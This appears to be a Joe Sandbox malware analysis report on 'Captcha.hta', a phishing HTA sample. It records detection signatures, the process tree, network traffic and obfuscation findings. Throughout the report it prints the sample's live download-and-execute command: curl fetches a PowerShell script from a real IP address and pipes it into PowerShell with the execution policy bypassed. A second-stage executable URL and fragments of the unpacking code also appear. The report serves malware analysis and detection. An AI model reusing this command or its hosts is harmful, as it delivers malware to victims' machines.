Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Captcha.hta

Overview

General Information

Sample name:Captcha.hta
Analysis ID:1573886
MD5:a7045bcb116c3d85f1ff3706bec2b920
SHA1:4ff06af316d7e0453c948d358065d71301ea204a
SHA256:8abf12e3a919213c8ff825c1cc1df070990156d829bd5c55d6ce2f6974d77272
Tags:htauser-abuse_ch
Infos:

Detection

HTMLPhisher
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected HtmlPhish44
Yara detected obfuscated html page
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Sigma detected: Suspicious MSHTA Child Process
Suspicious command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Usage Of Web Request Commands And Cmdlets
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 6388 cmdline: mshta.exe "C:\Users\user\Desktop\Captcha.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 6588 cmdline: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command - MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • curl.exe (PID: 6852 cmdline: curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
      • powershell.exe (PID: 6892 cmdline: powershell -NoProfile -ExecutionPolicy Bypass -Command - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Captcha.htaJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    Captcha.htaJoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security
      SourceRuleDescriptionAuthorStrings
      Process Memory Space: powershell.exe PID: 6892INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x1c8c9b:$b2: ::FromBase64String(
      • 0x1c8cd7:$b2: ::FromBase64String(
      • 0x1cb8a8:$b2: ::FromBase64String(
      • 0x1cb8f4:$b2: ::FromBase64String(
      • 0xdc31d:$s1: -join
      • 0xdca97:$s1: -join
      • 0x10c4d2:$s1: -join
      • 0x10f67e:$s1: -join
      • 0x170c26:$s1: -join
      • 0x17dcfb:$s1: -join
      • 0x1810cd:$s1: -join
      • 0x18177f:$s1: -join
      • 0x183270:$s1: -join
      • 0x185476:$s1: -join
      • 0x185c9d:$s1: -join
      • 0x18650d:$s1: -join
      • 0x186c48:$s1: -join
      • 0x186c7a:$s1: -join
      • 0x186cc2:$s1: -join
      • 0x186ce1:$s1: -join
      • 0x187531:$s1: -join

      System Summary

      barindex
      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\Captcha.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6388, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, ProcessId: 6588, ProcessName: cmd.exe
      Source: Process startedAuthor: frack113: Data: Command: powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6588, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command -, ProcessId: 6892, ProcessName: powershell.exe
      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\Captcha.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6388, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, ProcessId: 6588, ProcessName: cmd.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6588, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command -, ProcessId: 6892, ProcessName: powershell.exe
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: Captcha.htaReversingLabs: Detection: 13%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 89.8% probability

      Phishing

      barindex
      Source: Yara matchFile source: Captcha.hta, type: SAMPLE
      Source: Yara matchFile source: Captcha.hta, type: SAMPLE
      Source: Joe Sandbox ViewIP Address: 147.45.44.131 147.45.44.131
      Source: Joe Sandbox ViewASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: global trafficHTTP traffic detected: GET /infopage/bgfi.ps1 HTTP/1.1Host: 147.45.44.131User-Agent: curl/7.83.1Accept: */*X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
      Source: curl.exe, 00000004.00000002.1702414499.0000000002828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/b
      Source: curl.exe, 00000004.00000002.1702363082.00000000026B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/bgfi.ps1
      Source: curl.exe, 00000004.00000002.1702414499.0000000002828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/bgfi.ps1&
      Source: curl.exe, 00000004.00000002.1702414499.0000000002828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/bgfi.ps1N
      Source: powershell.exe, 00000005.00000002.1711251710.0000000004B54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1711251710.0000000004C78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/nghp.exe
      Source: powershell.exe, 00000005.00000002.1713961497.0000000005A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000005.00000002.1711251710.0000000004B54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000005.00000002.1711251710.0000000004A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000005.00000002.1711251710.0000000004B54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000005.00000002.1711251710.0000000004A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
      Source: powershell.exe, 00000005.00000002.1713961497.0000000005A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000005.00000002.1713961497.0000000005A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000005.00000002.1713961497.0000000005A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000005.00000002.1711251710.0000000004B54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000005.00000002.1711251710.00000000052ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: powershell.exe, 00000005.00000002.1713961497.0000000005A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

      System Summary

      barindex
      Source: Process Memory Space: powershell.exe PID: 6892, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00AFC1885_2_00AFC188
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00AFB8B85_2_00AFB8B8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00AFB5705_2_00AFB570
      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
      Source: Process Memory Space: powershell.exe PID: 6892, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: classification engineClassification label: mal100.phis.evad.winHTA@8/4@0/1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6608:120:WilError_03
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5pz45qgt.j5o.ps1Jump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: Captcha.htaReversingLabs: Detection: 13%
      Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\Captcha.hta"
      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command -
      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command -Jump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior

      Data Obfuscation

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($GxGtbA5g6P) $uBvxjwei2t = [Convert]::FromBase64String($cPIlxc8Zkc) $5i7PlKCF3O = [Convert]::FromBase64String($Bf2RxeD0z1) $8XwQAWCxe1 = [System.Security.Cryptography.Aes]::C
      Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -
      Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -Jump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
